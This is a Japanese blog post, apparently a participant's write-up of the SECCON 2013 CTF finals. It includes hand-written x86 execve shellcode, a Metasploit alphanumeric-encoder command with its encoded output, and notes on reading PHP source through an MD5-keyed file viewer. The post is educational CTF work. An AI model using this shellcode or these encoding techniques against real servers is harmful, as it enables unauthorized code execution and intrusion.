読者です 読者をやめる 読者になる 読者になる

SECCON 2013 Final WriteUP(2.kaku and hanoi.tower)

できたことより出来なかった事のほうが多いけれど。。。

2.taku

つーてんかく。

問題把握まで

問題サーバ上で動いているプログラムの実行ファイルとソースコード、そして設定ファイルが渡される。

正直、最初何をすればよいのかわからなかった。
とりあえずソースを読む。
 
ざっと見、子プロを立ててその中で任意のコードを実行できるプログラムらしかった。
また、設定ファイルは確かxinedの設定がこんなだったはず(うろ覚え)

つまり、「サーバ上でこのプログラムが動いているから、任意のコードを実行してFlagをとってみろ。」ってことじゃね?と思い至る。

ここまでで1時間以上費やしている。
おそらく、他チームは初見でこの結論に至っていたのではないだろうか。
経験値不足が悔やまれる。

シェルコード調達

んで、とにかくシェルコードを用意して実行してみよう。という段階に。
実行ファイルが x86-ELFだったので、多分サーバもx86なんだろうと想像。
 
xinetdでうまく動かす自信がなかったので、ローカルで動くテストプログラムを書いて、動くであろうシェルコードの準備をした。

・・・つっても書いたんじゃなくてググったんですけどね。

スクリプトキディには辛いぜと思いながら、shellを実行するshellcode(なんか若いヤングマンみたいな表現ですいません)を入手、ローカルで実行に成功。

サーバに投げてみるが、プロンプトが返ってこない。
が、コピペで送ってるので原因解析なんてできるわけがない。

仕方ないので、1からまじめに勉強して徹夜で考えよう。と結論づけ、他の問題に着手。

この時点で日は傾きつつあり、諦めた直後に新問題が開放される。
(すでにチームはビリから2番め)

夜のお勉強

競技終了後、他のチームメンバーの助言も踏まえてシェルコードを自分で書いてみた。
といってもこれもかなりよそからのパクリなのだが。。。

global _start

section .text
_start:

; PUSH the first null dword
xor eax, eax
push eax


push 0x736c2f6e
push 0x69622f2f

mov ebx, esp ;ebx points to the //bin/ls


mov edx, eax ;mov 0 into eax

;create the arguments array argument for ls
push eax ;push 0 onto the stack
push 0x6c
push 0x6d74682f
push 0x7777772f
push 0x7261762f ;push -l onto the stack
mov esi,esp ;mov the address of the top of the stack into esi

;prepare the argurments array for execution
push eax
push esi ;address of where our arguments are
push ebx ;address of where //bin/ls is
mov ecx, esp
mov al, 11
int 0x80

あまり深く考えたわけではないが、shから別コマンドを呼ぼうとしていたことが行けなかったのではないかと考え、lsと、catを実行できるようなコードにした。
結果これは正しかった(子プロからのforkが禁止されていたので)

上記の通り、sysexecve (http://man7.org/linux/man-pages/man2/execve.2.html)にパスと引数を食わせて動かすプログラムを用意。
ここまでやって3時を回っていたので、2日目の思考力を保つために仮眠。
(自宅から会場が遠いので6時前に起きる必要があったのです)

stage0 攻略

朝イチ、昨夜書いたコードを投入。
見事最初のフラグの取得に成功。
とりあえずチーム内の人権は獲得したが、もはやチーム自体が最下位なので、チームごとミジンコレベルの存在になりつつあった。

stage1

次のステージ。
isalnumでシェルコードがフィルタされるので、英数しか使えない。
 
metasploitの msfencode コマンドを使えばできるらしいことは知っていた。
しかし使うのは初めて。使い方をググって調べてみたのだが、おかしい。

msfencode -e x86/alpha_mixed -b '\x00' -i ./lscode.bin -t c
[*] x86/alpha_mixed succeeded with size 130 (iteration=1)

unsigned char buf[] =
"\x89\xe6\xda\xc7\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x70\x31\x59\x50\x70\x50\x65\x38\x50\x6e\x66\x4f\x72\x4c\x51"
"\x63\x61\x78\x36\x4f\x54\x6f\x32\x42\x35\x39\x6d\x59\x38\x63"
"\x6e\x69\x39\x52\x46\x30\x71\x78\x46\x4d\x30\x6c\x45\x50\x73"
"\x30\x6d\x59\x4b\x56\x72\x70\x53\x66\x63\x63\x6c\x49\x39\x71"
"\x78\x30\x66\x6b\x7a\x6d\x4d\x50\x41\x41";

どう見ても出力に 英数字以外を含んでいる。
(最初の7バイト)

きっと使い方が違うか、オプションが間違っているのだろうと調べてみたものの、わからず時間切れ。

他チームのwrite-upを見ると

alpha_mixedエンコーダは シェルコードのアドレスが入ったレジスタを指定しないとシェルコードの全てが英数字にならない。
シェルコードへのアドレスがEAXに残っているので、
msf> set BufferRegister EAX
msf> generate -e x86/alpha_mixed

(team 0x0 http://labs.scaltinof.net/memo2/seccon2013-writeup より引用)

とのこと。
今あらためてググっても出てこない/(^o^)\ 
ツールとかは普段から使えるようになってないとダメってことですね。
 
さらには

Metasploitにできて俺にできないわけがない
て事で自分で書いた

(Team Epshiron Delta http://epsilondelta.hatenablog.jp/entry/2014/03/05/213632 よr引用)
 
もうかっこいいとしか言いようが無い。
書くのなんて最初から諦めたわけで、その時点で意識が違いすぎました。
 

のこりのstage

ちなみに、stage2は、アセンブラ短歌。
stage3は、他チームとの妨害合戦(フィルタに任意の値を指定可能)だったようで。
どのみち、スクリプトキディな私にはstage1を超えても次は超えられなかったように思えます。
 
結論 使えなきゃダメ。書けなきゃダメ。

hanoi

ハノイの塔。
WEB系は苦手なのだが、うまい具合にflagが1つとれてしまい担当に。

1つめのフラグ

ファイル内容を表示するphpがあったので、そのphpソースコード自体を表示させてみた。
ファイルのアクセスキーがファイル名のMD5なのはチームメンバが初見で見破ってくれた。
ちなみにおれはMD5なんじゃねーのと思いつつ、末尾の改行文字を取り忘れてコケていた。アホ。
神様の確認結果: cat -n "filename" | md5sum
アホの確認結果: cat "filename" | md5sum

で、表示できるファイルが4つあることが判明。
4つ目のファイル(トップページを表示するphp)にキーワードが。
 

2つめのフラグどこだ

 
トップページの画像末尾に、dnsの問い合わせクエリが隠されていた。
オンライン予選と一緒じゃねーかと逆引きクエリを送ってみると
hanoi.
としか返ってこない。
ここで詰んだ。
 

実際の答え

 
公開された問題サーバは xxx.xxx.xxx.1
隠されていたDNSサーバは xxx.xxx.xxx.3
 
そして、stage2以降の問題は xxx.xxx.xxx.2
にあったらしい。

1と3がある時点で、2もいることを想像するのがハッカーらしい。
うーん経験不足。

そこから先はファイルに情報隠している問題だったようで、うまく行けば解けた可能性もあり、とても悔しい。
 
相手を「標的ネットワーク」という立体的な存在ではなく、「問題サーバとDNS」という2点で捉えていたことが敗因だと思う。
実際何かしようと思ったら、ほかに脆弱なホストがないか探すのが筋なわけで、それができなかったのはもう反省しか無い。
現場力不足。
 
 
ちなみに、他メンバーが担当した korin についても同じことが言える。
反射型XSS自体は知識としてあったのに、それを使う発想に至れなかった。
懇親会で言われてやっちまったと思いました。

総論

前に感想を書いたけど、いい経験になりました。
本業がセキュリティじゃないので、防御も攻撃も現場ではほとんど経験することがなく、まだまだガッコのオベンキョれべるにとどまっているな〜ということを痛感させられました。
 
足りないことだらけですが、足りないことすら見えてなかった参加前よりは進歩したってことで、基礎から出直します。